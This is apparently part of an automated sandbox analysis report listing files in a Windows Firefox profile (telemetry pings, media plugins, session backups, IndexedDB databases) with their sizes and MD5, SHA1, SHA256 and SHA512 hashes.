SHA256a94e446b42e88816f6304ced1854f131886a8eab09cd43d7e39d04f97335fcd5
SHA512e9c38d6189548b457b1c77d9a0246c148bba3893bd209372c346d4a23f0a3b23b5456086c3a47079b1866cf8cb1308068fb6b8cb0ad39c5f14f0cd2ab7e31910
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\8799f4b6-e6e5-48d7-ad62-9668e7e036e0
Filesize886B
MD551790686784618e1d19816ef58be5661
SHA13cdb570078896b549de066345d44ed1fd784ac68
SHA256c08bcb3f5674d50066649cd8ffc9647687e3197f2357e2b48696642a7ff6d32e
SHA5120dc1ff902ae1f04a84880218261a51e424c3dfc8dea9c7a9789be38b9d99167b53eaf2b116083adad49f42363f2cc76d51bbbefee855ee4c72888eb6d39c400b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\b3fa85d7-716f-4b69-8742-dfee2a72c9f0
Filesize883B
MD5cf6cba0818cd299c14fd49bc1dc97288
SHA107f2243bee16a528d0b8412ec18030cf101854ee
SHA2563338f30eef2136b05b913cd6a98fa13b48433b4ab7cf14eb45143aab0aa359ac
SHA512a141ab03327f5f7fc73e696760ea87ca7cd8af6f36937557c3ef826d5a6662b56545bca5377a8279a9db275a0003711c9e663aa4aed04da4656ca0704bba5cc3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\d8e9d537-a403-4069-aaa5-9a75198f9654
Filesize16KB
MD5e8f10309be9f051c088f5b13f1dc280d
SHA12fe18b0a4f03be954dd18454ec6d58d64f08d881
SHA25610a660187f8f15a2d74d6cf38e602c5a94fcad53afc1dce96908550307924ee3
SHA512c8a10073ad9b8b5583a3bc46c9e2267689c841558afcab17c28b109ddd4f46d23cab765e71951bf80342344ae4e01189e270383babe2524b79ef899085cc2707
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\f93eaa7e-9736-46ce-b204-18b5d30e6f62
Filesize235B
MD50399a5d64e1d3b67b10312f76694e63e
SHA1f6012882ee42e0954a81cd5c1aceae3948848618
SHA256957cda348322ed4859bb1692384829892367d75dfed12b326231efbb82e6efe2
SHA512b3511dffabb702b42111651915e8ef491f9906d34a9ec51dbd02e091a6904d706f3abed620ac5d4d63975ae2899d4e73fc9618a5209ff2845085eab8ca56f645
-
Filesize
16KB
MD526e5351d4b14856079b501e43179575f
SHA160e19bf4e97155d359c8911739e5657bf51094d4
SHA256eaeee36e3f60b6b34481f21144220e410386e900a77d6f391b39c5baf1c9e82b
SHA512629c314bfafb551120cb05730f2b5f7b1484989f75a06f210a60aedd1078de37c72988e0792d69ac400876ca25958207ccd038beb3a9f162884c00d484c199d6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize6.7MB
MD5bac8953de656d6d00e342ab767f08d5f
SHA195905bcacd2b6b340dedf425829aaf319c273593
SHA256709a241762973dca06a73d6b4da46502da34fe815ab440c8f621c0a69f8e3a15
SHA51249c1a989f1bf4c79c9ee1df096f33a4f5f234a3b208c3032ee230894701155aad712f04dd520163e15ed480623e2456f0e7354d6410e6329a9c01233f3bf45f5
-
Filesize
7KB
MD5a62aa5060257538caf52713910c38567
SHA135585f8f7a1ffd36761d1d6e052af3b9d5554c26
SHA256ef30b881efec2b62b4b481b4d34a99a5206e29aa2add2e28d73c3f48ce2d0cb5
SHA512934a2539d58ba9bb6f8270c1cef5026d4948cb00e168f16625cc1490fdd26175ee46873f7944aa5ada16e7dda74c79041d964f6921c068b20c93227324bc4398
-
Filesize
6KB
MD56a3063d5e05653524134aa8078b980ad
SHA1b50b43a8f4ac4f3d0157103d26874c105aecea95
SHA256a3ae024ec60abf0bdee65879ef0cbce313dd2ad5b354bb5cf2b156cd9027167d
SHA512dcf16e67745aa27ae88b969b603e523f58444d460f3b977815c0f08865cf3796349ac93cba58f41ccfecb7c2aa5da9de4a9723ae5ba011ec7218256c91cd67c8
-
Filesize
8KB
MD5348ff0d28b7fe70d33ab8de2f9e6ec1f
SHA1495a24ccccb7a3dec60b10819f0f23dd3a899345
SHA25687607e0a2ceb76dd55bef4e5fa815f306a900edb0d9d72bbe1682d4a937b5efc
SHA5120c9c3757c9c8a467606f2e07e447a2f4423ead29f3ef5f643b385462dee3bcc0475dd54b797011ebc2915cc2609fa7fa52c26bc72d398315454394adea60551a
-
Filesize
8KB
MD5b5e688581cc451c3afdf01a56b24b8c3
SHA11af4816fe6ca992f16ff99ee202d997a9a3fb002
SHA256728ea4cbfb59f8b279e7f252321908811f25b3ea831db05ae744b82e46dee91a
SHA5124165ba11c71e0e092e3661c1beeedc8c83dd79ed12e764c1e31cda6add639d3b5bd6421c970bbb3ec70f195bedb1be08b388b895a9d4e8891a736b6ea5307f66
-
Filesize
6KB
MD5cf320883691b2f2ed0d984e39c71bd5f
SHA1e31dee69c7e858c8707442efdca724c6c70e43a8
SHA2560a2e478018e781a5bbb64f695a54fa9a796322b3fce1ba222ed015713e1b62d6
SHA5126682fa23751295519ba692aaa14b4a8a42e954e7799b167d824647b4413a694a461e217e15041f3ab687e44f9b2433365bccda232246b5bf539768b01038dcc5
-
Filesize
6KB
MD5a13c8ac0ce5c77652dec4d9746a2acf7
SHA15685fad6d4192ee01b0964ba94b2aae4bca973c3
SHA256f5007e10b9d7894b15f0896d1b4a996aa202e872bae84c4e2f0dad00f4a35a71
SHA512bd39304686a835f12a7ff131f060a937859cca784e0733c6c7bf779ac4e05db240773d432ee40e710594d95f446071195ca19a51bf99a09023e93d88076076ce
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD507a4dfe061834be68aad2250d42e7dc1
SHA1b70ccff012bbfac4f608a45d64be040af648c48e
SHA256e6a69493e1e7976f9923f5a0ed6a4ff7a64480d3fdde52d102fe3b756b2fb411
SHA5125093c9d6598329d399fe7f1083f632db555901536f25cd5426b9cef2099cc713b55f500bb6e08f2cc188bce160191d951cefae528fbc15e05cd8bbcbe4ccf041
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize7.6MB
MD555ca028a1bc54bdfd4729cd91f07a6c7
SHA148b95be534436aef53566b6ef0b8a15897ff8f64
SHA25633edda2df2732d7b469845985895614d39f94525ab595a8c8bb08056182a5013
SHA51211ad8398c24120a0c60ee8291ef01d71184b039fc8766bfd7c3af043a91e0928e5808d3dae2fdabeccf86ea6483c04ef111ff910eee8b9da1923db0b85896164
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize6.0MB
MD5b33ec108e674fc44af3f9d35901741e7
SHA11613878314e976817effd33cf5f4905b1f3158db
SHA2564ccbb8d598bf7f2d4cbf9175714fef3dd9bb4a93170c5242638355dcf40c38c1
SHA512bc1c088396b02dc577fbcf606ac3d83386195d769d0c6c6dc020811a8fa7d88beeaeef8b11905470e786774b14f4708d2e52e479fd495ba6b7003ecfee96b60b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize5.1MB
MD57a064770e090c260e4c5e90d83cf709e
SHA178c58d918c6aa401b9fe26d29acc59dbe500f5c7
SHA256d655c442a57778d6f59f2dc12f55c9fd15e5d827e3dafe81270d1b508c0bc56f
SHA5127e022aa68045a4d06d8db124fa72233655e55fa4d02b687214bb2d03d077ba4e7f63709a5e8c12ed63ae7f45e91238eb3f6ca355b4d9b5af906c2f1eae950609
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize4.6MB
MD526b9a56cb764064e9fa08a3ead7b0147
SHA1e3cafef0832134808250ad30a39a7bee3baf6dc4
SHA25674520b9060a91a4bbdb2e08a4469e8f460b0187300c565f226b4dfcdd12fba55
SHA512d31cafe08d37d82a9d0ed526b86adaece3c65d5d31f204ec9d76baab3c6fca8f7fe6e7716cdad64634bda2c72c4f13f7a4fb5f35e78519dd0d3fbc44cc8b5bc9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize4.3MB
MD5d1fade3d961862be716613fa23f705f0
SHA10701ac5ad643b88c18ffbc0b3e2721b7044f5b7b
SHA2561607c6c0ea69914b9b5d72a3558b001a803147852c45c39f9ba39421dabd758e
SHA512e4fadaa1928ca4f75c251d6e58580bb60d3889ee7d3bcb21e277fee9c1021ee130fca914b5995ad82045a0ce1adfbce39fe3dceda31f1a3ae9007a88c03aa8d0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.8MB
MD53a90c9fe939d238e249280b36df6c5db
SHA11356fda402d08a57726abf584a9c06e3a2ef0120
SHA2566bc0d10b6b522eca0eeeca1a1605c90f7a9989449472a6cc0394f36b87fdd42a
SHA5125b75e519db94baf9bf50dbc9f9e58965d49d13964cd9098d0f881538e27d278dd64fa6a7df8d309ea41e91270e7a120af47ca7f13744e4a401ab6d4c8d14070e